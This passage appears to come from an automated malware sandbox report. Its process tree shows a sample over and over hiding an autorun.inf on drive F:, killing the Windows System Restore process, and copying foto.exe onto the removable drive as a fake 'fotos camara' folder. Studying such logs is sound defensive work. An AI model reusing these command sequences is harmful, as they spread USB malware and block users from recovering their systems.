    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2128
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:4572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:944
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2408
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3184
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3280
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4364
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:904
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1240
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:944
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:3736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:508
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1796
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:4204
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    PID:4600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:5068
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    PID:3068
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3820
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:5116
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:4700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4416
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4496
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:4392
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4608
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3244
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2596
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:8
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
